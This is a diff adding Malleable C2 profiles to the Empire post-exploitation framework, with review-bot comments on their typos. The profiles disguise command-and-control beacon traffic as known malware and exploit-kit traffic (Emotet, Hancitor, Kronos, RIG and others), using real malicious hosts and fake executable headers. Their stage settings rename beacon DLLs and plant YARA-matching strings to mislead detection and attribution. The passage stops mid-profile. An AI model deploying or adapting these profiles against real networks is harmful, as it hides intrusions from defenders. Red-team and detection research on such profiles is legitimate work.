New upstream version 3.7.2 Sophie Brun 3 years ago
26 changed file(s) with 4289 addition(s) and 21 deletion(s).
0 3.7.1
0 3.7.2
1
0 2/5/2021
1 ------------
2 - Version 3.7.2 Master Release
3 - Fixed Malleable C2 issue where netbios/netbiosu transformations used excessive resources (@Cx01N)
4 - Fixed error when loading http_hop listener options (@Cx01N)
5
06 1/27/2021
7 ------------
18 - Version 3.7.1 Master Release
29 - Added Kali message to main menu
310
0 #
1 # Asprox botnet traffic profile
2 # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
3 #
4 # Author: @harmj0y
5 #
6 set sample_name "Asprox Botnet";
7
8 set sleeptime "30000"; # use a ~30s delay between callbacks
9 set jitter "20"; # throw in a 10% jitter
10 set maxdns "255";
11 set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)";
12
13 http-get {
14
15 set uri "/";
16
17 client {
18
19 header "Accept" "*/*";
20 header "Content-Type" "application/x-www-form-urlencoded";
21 header "Content-Transfer-Encoding" "base64";
22 header "Connection" "Keep-Alive";
23
24 metadata {
25 netbiosu;
26 uri-append;
27 }
28 }
29
30 server {
31
32 header "Server" "nginx/1.2.5";
33 header "Content-Type" "text/html";
34 header "X-Powered-By" "PHP/5.4.4-7";
35 header "Vary" "Accept-Encoding";
36
37 output {
38 base64;
39 print;
40 }
41 }
42 }
43
44 http-post {
45
46 # random hash to try to simulate the post uri in the report
47 set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1";
48
49 client {
50
51 header "Accept" "*/*";
52 header "Content-Type" "application/x-www-form-urlencoded";
53 header "Content-Transfer-Encoding" "base64";
54 header "Connection" "Keep-Alive";
55
56 id {
57 parameter "id";
58 }
59
60 output {
61 base64;
62 print;
63 }
64 }
65
66 server {
67
68 header "Server" "nginx/1.2.5";
69 header "Content-Type" "text/html";
70 header "X-Powered-By" "PHP/5.4.4-7";
71 header "Vary" "Accept-Encoding";
72
73 output {
74 base64;
75 print;
76 }
77 }
78 }
79
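Review bot: The comment on `set jitter "20"; # throw in a 10% jitter` contradicts the value it annotates; the two Fiesta profiles in this same commit pair `set jitter "10"` with the identical 10% comment, so this line was most likely copied and only the value edited. Either the comment should become `# throw in a 20% jitter` or the value should be "10" if the comment is the intent, but the two should agree so a reader does not have to guess which one is the mistake.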
0 #emotet
1 #mostly taken from --> http://www.broadanalysis.com/2017/08/14/emotet-banking-trojan-2017-08-14-malspam/
2 #found this regarding the encoded 'cookie' string --> https://www.cisecurity.org/emotet-changes-ttp-and-arrives-in-united-states/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/LSnmkxT/";
16
17 client {
18
19 header "Host" "trevorcameron.com";
20 header "Connection" "Keep-Alive";
21
22
23 metadata {
24 netbios;
25 header "Cookie";
26
27
28 }
29
30
31 }
32
33 server {
34
35 header "Server" "Apache";
36 header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
37 header "Pragma" "no-cache";
38 header "Content-Disposition" "attachment; filename='NFccF.exe'";
39 header "Content-Transfer-Encoding" "binary";
40 header "Keep-Alive" "timeout=2, max=100";
41 header "Connection" "Keep-Alive";
42
43
44 output {
45 netbios;
46
47 prepend "11f10
48 MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
49
50 $.......h.+.,OE.,OE.,OE..... OE......OE.....1OE...F.:[email protected].%7..%OE.,OD.[OE...L.-OE.....-OE...G.-OE.Rich,OE.........PE..L......Y.............................].";
51
52 append "9(90989<9D9X9x9.9.9.9.9.: :@:`:.:.:.:.:.:.:.;(;H;h;.;.;.;.;.;.<(<H<h<.<.<.<.<.=(=H=h=.=.=.=.=.=.>(>D>H>P>X>`>t>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?4?<?P?..........p1t1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1(2X2h2x2.2.2.2.2.2.2.2.2p3t3.8.9.9.9.:0:P:h:.:.:.:.;0;;x;.;.;.;.;.<D<h<.<.<.<(=D=d=.=.=.=.>........................................................................................................................................................................................................................................................................................................
53 0";
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/LSnmkXT/";
62
63 client {
64
65 header "Host" "77.244.37:7080";
66 header "Connection" "Keep-Alive";
67 header "Cache-Control" "no-cache";
68
69 output {
70 netbios;
71 print;
72
73 }
74
75 #not sure where to stick this to look good...
76 id {
77 base64url;
78 header "Cookie";
79
80 }
81 }
82
83 server {
84
85 header "Server" "nginx";
86 header "Content-Type" "text/html; charset=UTF-8";
87 header "Connection" "keep-alive";
88
89
90 output {
91 netbios;
92 print;
93 }
94 }
95 }
96
97 http-stager {
98
99 set uri_x86 "/ckgawd/";
100 set uri_x64 "/Ckgawd/";
101
102 client {
103 header "Host" "blushphotoandfilm.com";
104 header "Connection" "Keep-Alive";
105 }
106
107 server {
108 header "Cache-Control" "Cache-Control: no-cache, no-store, max-age=0, must-revalidate";
109 header "Content-Type" "application/octet-stream";
110 header "Server" "Apache";
111 header "Connection" "Keep-Alive";
112
113 }
114
115
116 }
117 #from link in doc --> https://www.virustotal.com/#/file/17ced37ec7b9a02b142f5ca527e1bba05c723231b3d4fc1a951e45ec002a17e5/details
118 stage {
119 set compile_time "11 Nov 2010 23:29:33";
120 set userwx "false";
121 set image_size_x86 "298000";
122
123 #some dll names seen by --> https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Emotet.N!bit
124 transform-x86 {
125 strrep "beacon.dll" "api32.dll";
126 }
127
128 transform-x64 {
129 strrep "beacon.x64.dll" "mgr32.dll";
130 }
131
132 #https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Emotet.yar
133 stringw "{ 4d 5a }";
134 stringw "{ 0f 45 fb 0f 45 de }";
135 stringw "{ C7 04 24 00 00 00 00 89 44 24 0? }";
136 stringw "{ 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }";
137
138 }
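Review bot: In the http-stager server block, `header "Cache-Control" "Cache-Control: no-cache, no-store, max-age=0, must-revalidate";` repeats the header name inside the value, so the emitted line would read `Cache-Control: Cache-Control: no-cache, ...`; the http-get server block earlier in the same file already has the intended form, `header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";`. The http-post client block's `header "Host" "77.244.37:7080";` is also not a well-formed IPv4 literal (three octets), which looks like a transcription slip rather than a deliberate value. If either line is meant to reproduce a captured sample verbatim, a comment saying so would stop the next reader from "fixing" it.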
0 #
1 # Fiesta Exploit Kit traffic profile
2 # http://malware-traffic-analysis.net/2014/04/05/index.html
3 #
4 # Author: @harmj0y
5 #
6
7 set sleeptime "30000"; # use a ~30s delay between callbacks
8 set jitter "10"; # throw in a 10% jitter
9 set maxdns "255";
10 set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11";
11
12 http-get {
13
14 set uri "/rmvk30g/";
15
16 client {
17 # mimic this Fiesta instance's header information
18 header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2";
19 header "Connection" "keep-alive";
20
21 # encode session metadata as close as we can to a Fiesta URI request
22 metadata {
23 netbios;
24 append ";1;4;1";
25 uri-append;
26 }
27 }
28
29 server {
30 header "Server" "Apache/2.2.15 (CentOS)";
31 header "X-Powered-By" "PHP/5.3.27";
32 header "Content-Type" "application/octet-stream";
33 header "Connection" "close";
34
35 output {
36 print;
37 }
38 }
39 }
40
41 http-post {
42
43 set uri "/";
44
45 client {
46
47 # fake out a different user agent for the post back
48 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)";
49
50 id {
51 netbios;
52 uri-append;
53 }
54
55 output {
56 base64;
57 print;
58 }
59 }
60
61 server {
62 header "Server" "nginx/1.4.2";
63 header "Content-Type" "text/html";
64 header "Connection" "close";
65
66 output {
67 base64;
68 print;
69 }
70 }
71 }
72
0 #
1 # A second Fiesta Exploit Kit traffic profile
2 # http://malware-traffic-analysis.net/2014/04/05/index.html
3 #
4 # Author: @harmj0y
5 #
6 set sample_name "Fiesta Exploit Kit";
7
8 set sleeptime "30000"; # use a ~30s delay between callbacks
9 set jitter "10"; # throw in a 10% jitter
10 set maxdns "255";
11
12 http-get {
13
14 set uri "/v20idaf/";
15
16 client {
17 # mimic this Fiesta instance's header information
18 header "Accept" "*/*";
19 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";
20
21 # encode session metadata as close as we can to a Fiesta URI request
22 metadata {
23 netbios;
24 append ";112202;228";
25 uri-append;
26 }
27 }
28
29 server {
30 header "Server" "nginx/1.4.4";
31 header "Content-Type" "application/octet-stream";
32 header "Connection" "close";
33
34 output {
35 print;
36 }
37 }
38 }
39
40 http-post {
41
42 set uri "/";
43
44 client {
45
46 header "Accept" "*/*";
47 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";
48
49 id {
50 netbios;
51 uri-append;
52 }
53
54 output {
55 base64;
56 print;
57 }
58 }
59
60 server {
61 header "Server" "nginx/1.4.4";
62 header "Content-Type" "application/octet-stream";
63 header "Connection" "close";
64
65 output {
66 print;
67 }
68 }
69 }
70
0 #GlobeImposter ransomware
1 #taken from --> http://www.malware-traffic-analysis.net/2017/11/30/index.html
2 #xx0hcd
3
4 set sleeptime "30000";
5 set jitter "20";
6 set useragent "Mozilla Firefox/4.0(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0;SLC2; .NET CLD 3.5.30729; Media Center PC 6.0;)";
7 set dns_idle "8.8.8.8";
8 set maxdns "235";
9
10
11 http-get {
12
13 set uri "/JHGcd476334";
14
15 client {
16
17 header "Accept" "*/*";
18 header "Accept-Encoding" "gzip, deflate";
19 header "Host" "awholeblueworld.com";
20 header "Connection" "Keep-Alive";
21
22
23 metadata {
24 base64url;
25 header "Cookie";
26
27 }
28
29
30 }
31
32 server {
33
34 header "Server" "nginx";
35 header "Content-Type" "text/plain";
36 header "Connection" "keep-alive";
37 header "Vary" "Accept-Encoding";
38 header "X-Powered-By" "PleskLin";
39 header "Content-Encoding" "gzip";
40
41
42 output {
43
44 netbios;
45 prepend "500a ...............|T..?~.G..a.I H. AQ...J...";
46 print;
47 }
48 }
49 }
50
51 http-post {
52 set verb "GET";
53 set uri "/count.php";
54
55 client {
56
57 header "Accept" "*/*";
58 header "Accept-Encoding" "gzip, deflate";
59 header "Host" "awholeblueworld.com";
60 header "Connection" "Keep-Alive";
61
62 output {
63 base64url;
64 parameter "nu";
65
66
67
68 }
69
70
71 id {
72 base64url;
73 parameter "fb";
74
75 }
76
77 # parameter "fb" "110";
78
79 }
80
81 server {
82
83 header "Server" "nginx";
84 header "Content-Type" "text/plain";
85 header "Connection" "keep-alive";
86 header "Vary" "Accept-Encoding";
87 header "X-Powered-By" "PleskLin";
88 header "Content-Encoding" "gzip";
89
90
91 output {
92 netbios;
93 prepend "500a ...............|T..?~.G..a.I H. AQ...J...";
94 print;
95 }
96
97 }
98 }
99
100 http-stager {
101
102 set uri_x86 "/JHGCd476334";
103 set uri_x64 "/JHGcD476334";
104
105
106 client {
107
108 header "Host" "awholeblueworld";
109 header "Connection" "keep-alive";
110
111 }
112
113 server {
114
115 header "Server" "nginx";
116 header "Content-Type" "text/plain";
117 header "Connection" "keep-alive";
118 header "Vary" "Accept-Encoding";
119 header "X-Powered-By" "PleskLin";
120 header "Content-Encoding" "gzip";
121
122
123 output {
124
125 print;
126 }
127
128 }
129
130
131 }
132
133 stage {
134 set userwx "true";
135 set compile_time "03 Feb 2016 09:17:32";
136 set image_size_x86 "448012";
137 set image_size_x64 "448012";
138 #set obfuscate "true";
139 }
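Review bot: The http-stager client block sends `header "Host" "awholeblueworld";` while the http-get and http-post client blocks in the same profile send `header "Host" "awholeblueworld.com";`; with three blocks agreeing, the bare label in the stager reads as a truncation. Unless the mismatch is intentional, the stager line should match the other two, and if it is intentional a one-line comment next to it should say so.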
0 #hancitor
1 #taken from --> http://www.malware-traffic-analysis.net/2017/12/20/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11
12 http-get {
13
14 set uri "/mlu/forum.php";
15
16 client {
17
18 header "Host" "arrepsinrab.com";
19 header "Accept" "*/*";
20 header "Accept-Encoding" "identity, *;q=0";
21 header "Accept-Language" "en-US";
22 header "Content-Type" "application/octet-stream";
23 header "Connection" "close";
24 header "Content-Encoding" "binary";
25
26
27 metadata {
28 netbios;
29 header "Cookie";
30
31
32 }
33
34
35 }
36
37 server {
38
39 header "Server" "nginx/1.10.2";
40 header "Content-Type" "text/html";
41 header "Keep-Alive" "timeout=2, max=100";
42 header "Connection" "close";
43 header "X-Powered-By" "PHP/5.4.45";
44
45
46 output {
47 netbios;
48 print;
49 }
50 }
51 }
52
53 http-post {
54
55 set uri "/ls5/forum.php";
56
57 client {
58
59 header "Accept" "*/*";
60 header "Content-Type" "application/x-www-form-urlencoded";
61 header "Host" "gedidnundno.com";
62 header "Cache-Control" "no-cache";
63
64 output {
65 netbios;
66 print;
67
68 }
69
70
71 id {
72 netbiosu;
73 header "GUID";
74
75 }
76 }
77
78 server {
79
80 header "Server" "nginx/1.10.2";
81 header "Content-Type" "text/html";
82 header "Transfer-Encoding" "chunked";
83 header "Connection" "keep-alive";
84 header "X-Powered-By" "PHP/5.4.45";
85
86
87 output {
88 netbios;
89 print;
90 }
91 }
92 }
93
94 http-stager {
95
96 set uri_x86 "/lS5/forum.php";
97 set uri_x64 "/ls5/Forum.php";
98
99 client {
100 header "Accept" "text/html, application/xhtml+xml, */*";
101 header "Accept-Language" "en-US";
102 header "Host" "acamonitoringltd.ca";
103 header "Connection" "Keep-Alive";
104 }
105
106 server {
107 header "Server" "nginx";
108 header "Content-Type" "application/msword;";
109 header "Keep-Alive" "timeout=2, max=100";
110 header "Connection" "Keep-Alive";
111 header "X-Powered-By" "PHP/5.3.3";
112 header "Content-Disposition" "attachment; filename=fax_286509.doc";
113 header "Pragma" "private";
114
115 }
116
117
118 }
119
120 stage {
121 #random
122 set compile_time "15 Nov 2017 12:24:14";
123 set userwx "false";
124 set image_size_x86 "301000";
125
126 #https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html
127 transform-x86 {
128 strrep "beacon.dll" "pm.dll";
129 }
130
131 transform-x64 {
132 strrep "beacon.x64.dll" "PM.dll";
133 }
134
135 #https://github.com/Yara-Rules/rules/blob/d1da9c002d1d00045f53ea1502cfcc7dd43c115e/Malicious_Documents/Maldoc_hancitor_dropper
136 stringw "{ 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }";
137 stringw "{ 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }";
138 stringw "{ 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }";
139 stringw "{ 50 4F 4C 41 }";
140
141 }
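Review bot: The http-stager server block's `header "Content-Type" "application/msword;";` carries a trailing semicolon with no parameter after it, which is not a well-formed media type; every other Content-Type value in this profile is written without one, so `header "Content-Type" "application/msword";` is the consistent form. If the stray semicolon is reproducing the captured response byte-for-byte, a comment beside the line stating that would keep it from being cleaned up later.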
0 #kronos
1 #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/
2 #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/
3 #https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100
4 #xx0hcd
5
6
7 set sleeptime "30000";
8 set jitter "20";
9 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36";
10 set dns_idle "8.8.8.8";
11 set maxdns "235";
12
13
14 http-get {
15
16 set uri "/lampi/upload/38bacf4f.exe";
17
18 client {
19
20 header "Host" "hjbkjbhkjhbkjhl.info";
21
22
23 metadata {
24 base64url;
25 prepend "PHPSESSID=";
26 header "Cookie";
27
28 }
29
30 }
31
32 server {
33
34 header "Server" "nginx/1.10.2";
35 header "Content-Type" "application/octet-stream";
36 header "Connection" "close";
37 header "ETag" "2ca0669-6d600-557bba73d8218";
38 header "Accept-Ranges" "bytes";
39
40 output {
41
42 netbios;
43 prepend "MZ....................@..........................!......L..!This Program cannot be run in DOS mode.$...................~........:.....:.....:.....7.{.-...7.D.H..7.E...";
44
45 print;
46 }
47 }
48 }
49
50 http-post {
51
52 set uri "/lampi/connect.php";
53
54 client {
55
56 header "Host" "hjbkjbhkjhbkjhl.info";
57 header "Cache-Control" "no-cache";
58
59 output {
60 base64url;
61 prepend "PHPSESSID=";
62
63 header "Cookie";
64
65
66 }
67
68
69 id {
70 base64url;
71 parameter "a";
72
73 }
74 }
75
76 server {
77
78 header "Server" "nginx/1.10.2";
79 header "Content-Type" "text/html; charset=windows-1251";
80 header "X-Powered-By" "PHP/5.3.3";
81 header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0";
82 header "Pragma" "non-cache";
83
84
85 output {
86 netbios;
87
88 print;
89 }
90 }
91 }
92
93 http-stager {
94
95 set uri_x86 "/lampi/Connect.php";
96 set uri_x64 "/Lampi/connect.php";
97
98 client {
99 header "Host" "hjbkjbhkjhbkjhl.info";
100 header "Cache-Control" "no-cache";
101 }
102
103 server {
104 header "Server" "nginx/1.10.2";
105 header "Content-Type" "text/html; charset=windows-1251";
106 header "X-Powered-By" "PHP/5.3.3";
107 header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0";
108 header "Pragma" "non-cache";
109
110 }
111
112
113 }
114
115
116
117 #from peclone
118 stage {
119 set checksum "0";
120 set compile_time "23 Aug 2017 10:19:26";
121 set entry_point "37713";
122 set image_size_x86 "495616";
123 set image_size_x64 "495616";
124 set rich_header "\x07\x4f\x6b\x48\x43\x2e\x05\x1b\x43\x2e\x05\x1b\x43\x2e\x05\x1b\xf7\xb2\xf4\x1b\x49\x2e\x05\x1b\xf7\xb2\xf6\x1b\xc2\x2e\x05\x1b\xf7\xb2\xf7\x1b\x5a\x2e\x05\x1b\x78\x70\x06\x1a\x51\x2e\x05\x1b\x78\x70\x01\x1a\x51\x2e\x05\x1b\x78\x70\x00\x1a\x66\x2e\x05\x1b\x4a\x56\x96\x1b\x44\x2e\x05\x1b\x43\x2e\x04\x1b\x21\x2e\x05\x1b\xd4\x70\x0c\x1a\x42\x2e\x05\x1b\xd1\x70\xfa\x1b\x42\x2e\x05\x1b\xd4\x70\x07\x1a\x42\x2e\x05\x1b\x52\x69\x63\x68\x43\x2e\x05\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
125 }
126
127
128
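Review bot: The http-post and http-stager server blocks both set `header "Pragma" "non-cache";` and a Cache-Control value containing `non-cache`; `non-cache` is not a defined directive (the standard one is `no-cache`, which the emotet and hancitor profiles in this commit use), and the same `Pragma` value appears again in the rigEK profile's http-stager client block later in this commit. If these are faithful copies of the observed responses that is fine, but it should be recorded in a comment, because as written they read as typos that a later maintainer will normalise.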
0 #ramnit trojan
1 #combines traffic seen from seamless campaign
2 #taken from --> https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/redirect";
16
17 client {
18
19 header "Accept" "text/html, application/xhtml+xml, */*";
20 header "Accept-Language" "en-US";
21 header "Accept-Encoding" "gzip, deflate";
22 header "Host" "redirect.turself-josented.com";
23 header "Connection" "Keep-Alive";
24
25
26
27 metadata {
28 netbios;
29 parameter "target";
30
31
32 }
33
34
35 }
36
37 server {
38
39 header "Server" "nginx";
40 header "Content-Type" "text/html;charset=UTF-8";
41 header "Connection" "keep-alive";
42 header "Cache-Control" "no-store, no-cache, pre-check=0, post-check=0";
43 header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT";
44 header "Pragma" "no-cache";
45
46
47 output {
48 base64;
49 prepend "105";
50 prepend "<html><head><link rel=\"icon\" type=\"image/gif\" href=\"data:image/gif;base64,";
51
52 append "\"/><meta http-equiv=\"refresh\" content=\"0;URL='http://xn-b1aanbboc3ad8jee4bff.xn--p1ai/gav4.php'\" /></head><body></body></html>";
53
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/Redirect.php";
62
63 client {
64
65 header "Accept" "*/*";
66 # header "Content-Type" "application/x-www-form-urlencoded";
67 # header "X-Requested-With" "XMLHttpRequest";
68 header "Referer" "http://........../redirect.php?acsc=93042904";
69 header "Accept-Language" "en-US";
70 header "Host" "xn--b1aanbboc3ad8jee4bff.xn--p1ai";
71 # header "Connection" "Keep-Alive";
72
73 output {
74 netbios;
75 print;
76
77 }
78
79
80 id {
81 netbios;
82 prepend "http://........../redirect.php?acsc=";
83 header "Referer";
84
85 }
86 }
87
88 server {
89
90 header "Server" "nginx";
91 header "Content-Type" "text/html, charset=UTF-8";
92 header "Connection" "keep-alive";
93 header "Vary" "Accept-Encoding";
94 header "X-Powered-By" "PHP/5.6.30";
95 header "Cache-Control" "no-store, no-cache, must-revalidate, max-age=0";
96 header "Content-Encoding" "gzip";
97
98
99 output {
100 netbios;
101 print;
102 }
103 }
104 }
105
106 http-stager {
107
108 set uri_x86 "/Jump/next.php";
109 set uri_x64 "/jump/Next.php";
110
111 client {
112 header "Accept" "text/html, application/xhtml+xml, */*";
113 header "Referer" "http://buzzadnetwork.com/jump/next.php?r=1566861&sub1=";
114 header "Accept-Language" "en-US";
115 header "Accept-Encoding" "gzip, deflate";
116 header "Host" "www.buzzadnetwork.com";
117 header "Connection" "Keep-Alive";
118 }
119
120 server {
121 header "Server" "openresty";
122 header "Content-Type" "text/html; charset=utf-8";
123 header "Keep-Alive" "timeout=2, max=100";
124 header "Connection" "Keep-Alive";
125 header "Location" "http://xn--b1aanbboc3ad8jee4bff.xn--p1ai/redirect.php?acsc=93042904";
126 #has 2 r's in 'referrer'
127 header "Referrer-Policy" "no-referrer";
128 header "Vary" "Accept-Encoding";
129
130 }
131
132
133 }
134
135 stage {
136 #https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf
137 set compile_time "09 Jan 2014 12:24:14";
138 set userwx "false";
139 set image_size_x86 "316224";
140 set image_size_x64 "616224";
141
142 transform-x86 {
143 strrep "beacon.dll" "rmnsft.dll";
144 }
145
146 transform-x64 {
147 strrep "beacon.x64.dll" "RMNSFT.dll";
148 }
149
150 #https://github.com/tbarabosch/quincy-complementary-material/blob/master/yara/ramnit.yara
151 stringw "USERPASSCWD CDUPQUITPORTPASVTYPEMODERETRSTORAPPERESTRNFRRNTOABORDELERMD";
152 stringw "ModuleCode";
153 stringw "StartRoutine";
154 stringw "cookies.txt";
155
156 }
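Review bot: The http-post server block's `header "Content-Type" "text/html, charset=UTF-8";` separates the media type from its charset parameter with a comma, whereas the http-get server block in the same profile uses the standard `text/html;charset=UTF-8`. The punycode host is also spelled two ways: the http-get append string uses `xn-b1aanbboc3ad8jee4bff.xn--p1ai` (single hyphen after `xn`), while the http-post Host header and the stager Location header use `xn--b1aanbboc3ad8jee4bff.xn--p1ai`, so one of those is a typo. Neither inconsistency is noted in the file; a fix or a comment explaining which form matches the capture would help.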
0 #rigEK
1 #taken from --> http://www.malware-traffic-analysis.net/2018/01/30/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11
12 http-get {
13
14 set uri "/";
15
16 client {
17
18 header "Accept" "text/html, */*";
19 header "Accept-Language" "en-US";
20 header "Host" "176.57.208.59";
21 header "Connection" "Keep-Alive";
22
23
24
25 metadata {
26 netbios;
27 append "FeJzPWAlzAFfZGVub21pbmF0aW9ucwSTKqgxlbbnLbhBk";
28 parameter "Mzk2MTw";
29
30
31 }
32
33 parameter "GUaq" "OynNUEcKZTPj";
34
35 }
36
37 server {
38
39 header "Server" "nginx/1.6.2";
40 header "Content-Type" "text/html;charset=UTF-8";
41 header "Connection" "keep-alive";
42 header "Vary" "Accept-Encoding";
43 header "Content-Encoding" "gzip";
44
45
46 output {
47 netbios;
48
49 prepend "............[....0.<.Wx.a...=-...q..*.%(.. ..~.TFW..U z....))%...of.|.....$.52.....w...~....o..._.....w8.........z......m.[..e....j.9<n.._+..5.uVi.-........qC...V.]n..._..'.w..e............y..o......j..-bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd..w.............fu...WY......o8.=..YG..%....:1..... :(.~.......u..n9m..m.......V:m...3......j2....vM....zVv.u.";
50
51 append "..EQk.....q.....1.t..pNjq...u...m.h..........z+....Z*X.r...
52 ..*..N.z..8.1.m .y.F.1....U.. .........
53 ....Z'=..+..H...aI ..)..36J~..O.n.....J.....!=G...o._.....s!......-p.....+>........,.r......./......7|>.......2.5ad../.....-lj......N..T...x...9N..
54 .....N.a=..G..N...
55 .V.L.\"..U.d.Y.....s.....H.|. .4e...(b.CLV....Z..x..^v...%bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd...K.).d.......j.~(.y.u+.._c*....S$p.R.).../[email protected]......";
56
57 print;
58
59
60 }
61 }
62 }
63
64 http-post {
65
66 set uri "/gate.php";
67
68 client {
69
70 header "Host" "doueven.click";
71 header "Connection" "close";
72 header "Accept-Language" "en-US";
73 header "Content-Type" "image/jpeg";
74
75 output {
76 netbios;
77 print;
78
79 }
80
81
82 id {
83 netbios;
84 header "Cookie";
85
86 }
87 }
88
89 server {
90
91 header "Server" "Apache";
92 header "Upgrade" "h2,h2c";
93 header "Connection" "Upgrade, close";
94 header "Content-Type" "application/octet-stream";
95
96
97 output {
98 netbios;
99 prepend "IX.";
100 prepend " ";
101 prepend " ";
102
103 print;
104 }
105 }
106 }
107
108 http-stager {
109
110 set uri_x86 "/prink.exe";
111 set uri_x64 "/Prink.exe";
112
113 client {
114 header "Host" "31.31.203.14";
115 header "Accept-Language" "en-us";
116 header "Accept" "text/html, application/xml, image/png, image/jpeg, image/gif, image/x-xbitmap";
117 header "Accept-Charset" "utf-8, utf-16, iso-8859-1";
118 header "Pragma" "non-cache";
119 header "Connection" "close";
120 }
121
122 server {
123 header "Server" "nginx/1.10.2";
124 header "Content-Type" "application/octet-stream";
125 header "Keep-Alive" "timeout=2, max=100";
126 header "Connection" "close";
127 header "ETag" "be339-de000-563c784ba5900";
128 header "Accept-Ranges" "bytes";
129
130 }
131
132
133 }
134
135 stage {
136
137 set compile_time "28 Jan 2018 08:12:18";
138 set userwx "false";
139 set image_size_x86 "428544";
140 set image_size_x64 "428544";
141
142
143 }
0 #saefko.profile
1 #https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat
2 #xx0hcd
3
4 ###global options###
5 set sleeptime "5000";
6 set jitter "33";
7 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
8
9 set sample_name "saefko.profile";
10
11 http-get {
12
13 set uri "/love/server.php";
14
15 set verb "GET";
16
17 client {
18
19 header "Host" "acpananma.com";
20
21
22 metadata {
23 base64url;
24 parameter "pass";
25 }
26
27 parameter "command" "UpdateHTTPIRCStatus";
28 parameter "machine_id" "202";
29 parameter "irc_status" "1";
30
31 }
32
33 server {
34 header "Server" "Apache";
35 header "X-Powered-By" "PHP/5.6.36";
36 header "Vary" "Accept-Encoding";
37 header "Content-Type" "text/html; charset=UTF-8";
38
39 output {
40
41 netbios;
42
43 prepend "ok\n";
44 prepend "2\n";
45
46 append "0\n";
47
48 print;
49 }
50 }
51 }
52
53 http-post {
54
55 set uri "/Love/server.php";
56 #set verb "GET";
57 set verb "POST";
58
59 client {
60
61 header "Content-Type" "application/x-www-form-urlencoded";
62 header "Host" "acpananma.com";
63 header "Expect" "100-continue";
64 header "Connection" "Keep-Alive";
65
66
67 output {
68 base64url;
69 parameter "command";
70
71 }
72
73 id {
74 base64url;
75 parameter "pass";
76
77 }
78
79 }
80
81 server {
82 header "Host" "acpananma.com";
83
84 output {
85 netbios;
86
87 prepend "\nHTTP/1.1 100 Continue\n\n";
88
89 #checked to make sure the misspells were misspelled, uh, correctly?
